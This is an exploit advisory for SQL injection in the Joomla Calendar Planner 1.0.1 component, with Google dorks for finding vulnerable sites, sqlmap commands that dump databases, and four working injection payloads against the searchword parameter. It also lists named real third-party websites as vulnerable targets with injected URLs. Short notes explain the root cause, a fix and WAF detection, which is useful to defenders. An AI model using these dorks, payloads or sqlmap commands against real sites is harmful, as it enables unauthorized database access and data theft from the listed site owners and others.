-- Date: 20/08/2017
-- Vendor Homepage: http://joomlathat.com/
-- W10
-- Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/calendar-planner/
-- Version: 1.0.1
-- Category: Webapps
-- Dorks:
=== Dork1: "inurl:option=com_calendarplanner"
=== Dork2: "inurl:/index.php/component/calendarplanner/events?searchword=&option=com_calendaprlanner&view=events&category_id="
=== Dork3: "inurl:events?searchword=&option=com_calendarplanner&view=events&category_id="
-- Credits: Information - Anonymous
-- Author: Ihsan Sencan
-- Web: http://ihsan.net/
-- DumpDb: Remove: "&date_in=2017-04-17&date_out=&access_select=1&multiselect=1&option=com_calendarplanner&view=events&category_id=0"
Add: 0'
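Message: Alert: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '') ORDER BY ev.date_start ASC , ev.hour_start ASC' at line 1
-- Note: the raw MariaDB error is returned to the browser, and the fragment it quotes shows the submitted quote character ending up inside the component's events query. This indicates that the request value is concatenated into the SQL text without escaping. The fix belongs in the component: bind or escape the value (Joomla's database driver provides quote()/escape()), cast numeric ids such as category_id to integers, and keep database error text out of HTTP responses.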
--- Erase : sqlmap -u https://site/es/component/calendarplanner/events?searchword= --------> &date_in=2017-04-17&date_out=&access_select=1&multiselect=1&option=com_calendarplanner&view=events&category_id=0 <----------
--- sqlmap -u https://www.site.com/es/component/calendarplanner/events?searchword= --dbs
-- Demo:
- http://www.dipartimentodesign.polimi.it/agenda/events?searchword=&date_in=2017-01-02&date_out=&option=com_calendarplanner&view=events&category_id=0
- http://www.aumaujaya.org/index.php/2013-02-24-18-14-58/events/events?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
- http://www.cadam-solutions.ch/2017/index.php/component/calendarplanner/events?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
- http://www.akdh-ev.de/ausstellungen/ausstellungstermine.html?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
- http://www.akdh-ev.de/ausstellungen/ausstellungstermine.html?searchword=&date_in=2017-05-18&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
- https://www.serenacentral.com/community/events/events?searchword=&date_in=2017-07-28&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
- http://www.dipartimentodesign.polimi.it/agenda/events?searchword=&date_in=2017-03-30&date_out=&option=com_calendarplanner&view=events&category_id=0'
--P0Ff:
============================================
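==Parameter: searchword (GET)
-- Note: all four techniques listed below are reported against this one GET parameter, so they share a single root cause, and correcting how searchword is placed into the query addresses all of them. For detection, requests carrying option=com_calendarplanner whose searchword contains quote characters or SQL keywords (UNION SELECT, SLEEP(, INFORMATION_SCHEMA) are worth alerting on in web-server and WAF logs.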
====== Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: searchword=") AND 6499=6499#
====== Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: searchword=") OR (SELECT 7934 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7934=7934,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("jqvr"="jqvr
====== Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: searchword=") OR SLEEP(5) AND ("mmOk"="mmOk
====== Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: searchword=") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717071,0x796145654d6e6f6f436e41637678434f74496f765a626a666c645461484d63747648525a56565175,0x7170627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
=============================================================